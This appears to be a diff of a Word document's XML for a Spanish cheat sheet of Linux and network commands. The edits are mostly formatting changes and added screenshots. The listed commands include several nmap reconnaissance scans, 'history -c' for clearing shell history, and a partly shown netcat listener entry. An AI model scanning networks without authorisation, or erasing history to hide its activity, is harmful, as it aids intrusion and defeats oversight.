+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>netstat -tuln</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71F7C3F4" wp14:editId="5A2DC89A">
+            <wp:extent cx="5400040" cy="891540"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+            <wp:docPr id="90650595" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="90650595" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="891540"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="1D971064">
-          <v:rect id="_x0000_i1497" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -876,19 +1052,57 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lsof</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -i</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+      <w:r>
+        <w:t>lsof -i</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="637C0A2E" wp14:editId="3EB6031F">
+            <wp:extent cx="5400040" cy="1386205"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="1663524186" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1663524186" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="1386205"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:pict w14:anchorId="475C8AE5">
-          <v:rect id="_x0000_i1498" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -908,16 +1122,14 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>who</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="4449405E">
-          <v:rect id="_x0000_i1499" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -937,16 +1149,14 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>history</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="4937336F">
-          <v:rect id="_x0000_i1500" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -966,19 +1176,14 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>history</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -c</w:t>
+      <w:r>
+        <w:t>history -c</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="65BD08A2">
-          <v:rect id="_x0000_i1501" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -990,226 +1195,179 @@
         <w:rPr>
           <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
         </w:rPr>
+        <w:t>🌐</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> BLOQUE 2: REDES Y ESCANEO (21–40)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="20010A7E">
+          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>21. Escaneo básico con Nmap</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>nmap 192.168.1.1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="62FC3CDE">
+          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>22. Escaneo de puertos específicos</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>nmap -p 22,80,443 192.168.1.1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="01B7FA3A">
+          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>23. Escaneo rápido</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>nmap -F 192.168.1.1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="0A0733ED">
+          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>24. Escaneo de red</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>nmap 192.168.1.0/24</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="515FCF0F">
+          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>25. Detección de servicios</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>nmap -sV 192.168.1.1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="6397599D">
+          <v:rect id="_x0000_i1051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>🌐</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> BLOQUE 2: REDES Y ESCANEO (21–40)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="20010A7E">
-          <v:rect id="_x0000_i1502" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">21. Escaneo básico con </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 192.168.1.1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="62FC3CDE">
-          <v:rect id="_x0000_i1503" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>22. Escaneo de puertos específicos</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -p 22,80,443 192.168.1.1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="01B7FA3A">
-          <v:rect id="_x0000_i1504" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>23. Escaneo rápido</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -F 192.168.1.1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="0A0733ED">
-          <v:rect id="_x0000_i1505" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>24. Escaneo de red</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 192.168.1.0/24</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="515FCF0F">
-          <v:rect id="_x0000_i1506" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>25. Detección de servicios</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sV</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 192.168.1.1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="6397599D">
-          <v:rect id="_x0000_i1507" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
         <w:t>26. Detección de SO</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -O 192.168.1.1</w:t>
+      <w:r>
+        <w:t>nmap -O 192.168.1.1</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="4055D186">
-          <v:rect id="_x0000_i1508" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -1229,19 +1387,14 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -A 192.168.1.1</w:t>
+      <w:r>
+        <w:t>nmap -A 192.168.1.1</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="3753D454">
-          <v:rect id="_x0000_i1509" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -1261,27 +1414,14 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>oN</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> resultado.txt 192.168.1.1</w:t>
+      <w:r>
+        <w:t>nmap -oN resultado.txt 192.168.1.1</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="26055B68">
-          <v:rect id="_x0000_i1510" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -1307,270 +1447,198 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:pict w14:anchorId="369063CC">
+          <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>30. Ver ruta</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>traceroute google.com</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="5C5159BB">
+          <v:rect id="_x0000_i1056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>31. IP local</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>ip a</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="37EC45DB">
+          <v:rect id="_x0000_i1057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>32. Gateway</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>ip route</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="7E40C41D">
+          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>33. DNS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>cat /etc/resolv.conf</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="15B07969">
+          <v:rect id="_x0000_i1059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>34. Test DNS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>nslookup google.com</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="2E2E61C6">
+          <v:rect id="_x0000_i1060" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>35. Alternativa</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:pict w14:anchorId="369063CC">
-          <v:rect id="_x0000_i1511" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>30. Ver ruta</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>traceroute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> google.com</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="5C5159BB">
-          <v:rect id="_x0000_i1512" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>31. IP local</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> a</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="37EC45DB">
-          <v:rect id="_x0000_i1513" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>32. Gateway</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>route</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="7E40C41D">
-          <v:rect id="_x0000_i1514" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>33. DNS</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>resolv.conf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="15B07969">
-          <v:rect id="_x0000_i1515" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>34. Test DNS</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>nslookup google.com</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="2E2E61C6">
-          <v:rect id="_x0000_i1516" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>35. Alternativa</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dig</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> google.com</w:t>
+        <w:t>dig google.com</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="4469BE59">
-          <v:rect id="_x0000_i1517" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>36. Escuchar puerto (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
